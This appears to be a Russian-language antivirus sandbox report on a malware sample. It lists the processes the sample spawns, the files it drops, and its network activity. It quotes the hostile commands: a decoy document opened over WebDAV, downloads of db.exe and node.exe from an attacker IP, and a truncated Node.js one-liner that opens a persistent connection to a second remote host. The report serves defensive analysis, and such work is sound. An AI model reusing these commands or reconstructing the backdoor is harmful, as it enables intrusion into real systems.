Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "\\164.92.135.160\DavWWWRoot\AKT_sverki_Parus.docx"
- '%ALLUSERSPROFILE%\hlwret\node.exe' "%ALLUSERSPROFILE%\HLWRET\s"
- '%ALLUSERSPROFILE%\hlwret\node.exe' -e "(function rx(){try{__dirname=require('path').dirname(process.argv[0]),cx=require('net').connect(80,'146.190.27.153',function(){this.setKeepAlive(!0,3e4),this.a='{'+Math.random()+'}',this.b=...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\akt_sverki_parus0.docx
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\db0.exe
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\node0.exe
- %ALLUSERSPROFILE%\hlwret\node.exe
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\s0
- %ALLUSERSPROFILE%\hlwret\s
Сетевая активность
Подключается к
- '16#.#2.135.160':80
TCP
Запросы HTTP GET
- http://16#.#2.135.160/db.exe
- http://16#.#2.135.160/node.exe
- http://16#.#2.135.160/AKT_sverki_Parus.docx
- http://16#.#2.135.160/s
Другие
- '16#.#2.135.160':80
Другое
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\hlwret\node.exe' -e "(function rx(){try{__dirname=require('path').dirname(process.argv[0]),cx=require('net').connect(80,'146.190.27.153',function(){this.setKeepAlive(!0,3e4),this.a='{'+Math.random()+'}',this.b=...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\net.exe' use http://16#.#2.135.160
